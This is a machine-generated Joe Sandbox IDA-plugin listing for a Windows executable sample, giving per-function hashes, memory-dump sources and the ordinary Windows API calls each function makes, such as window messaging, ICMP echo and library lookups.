                                                                                                                                                                            • Opcode ID: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                                                                                                                                                            • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                                                                            • Opcode Fuzzy Hash: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DestroyWindow
                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                            • API String ID: 3375834691-2298589950
                                                                                                                                                                            • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                                                            • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                                                            • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                            • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                            • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                                                            • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                            • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                                                                            • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                            • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                                                            • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                            • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                                                                            • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                            • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                                                            • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                            • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                            • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                                                            • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                                                                            • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                                                                            • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 1515696956-2761332787
                                                                                                                                                                            • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                                                            • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                                                            • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00449828
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 772068139-4108050209
                                                                                                                                                                            • Opcode ID: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                                                                                                                                                            • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                                                                            • Opcode Fuzzy Hash: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocTask_wcslen
                                                                                                                                                                            • String ID: hkG
                                                                                                                                                                            • API String ID: 2651040394-3610518997
                                                                                                                                                                            • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                            • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                                                            • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                            • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-1816364905
                                                                                                                                                                            • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                            • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                                                            • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                            • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                            • API String ID: 2574300362-58917771
                                                                                                                                                                            • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                            • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                            • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                            • API String ID: 2574300362-3530519716
                                                                                                                                                                            • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                            • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                                                                            • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                            • API String ID: 2574300362-275556492
                                                                                                                                                                            • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                            • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                                                                            • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                            • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-3024904723
                                                                                                                                                                            • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                                                                            • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                                                                                                            • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                                                                            • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-192647395
                                                                                                                                                                            • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                                                                                                            • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                                                                                                                            • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                            • Opcode ID: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
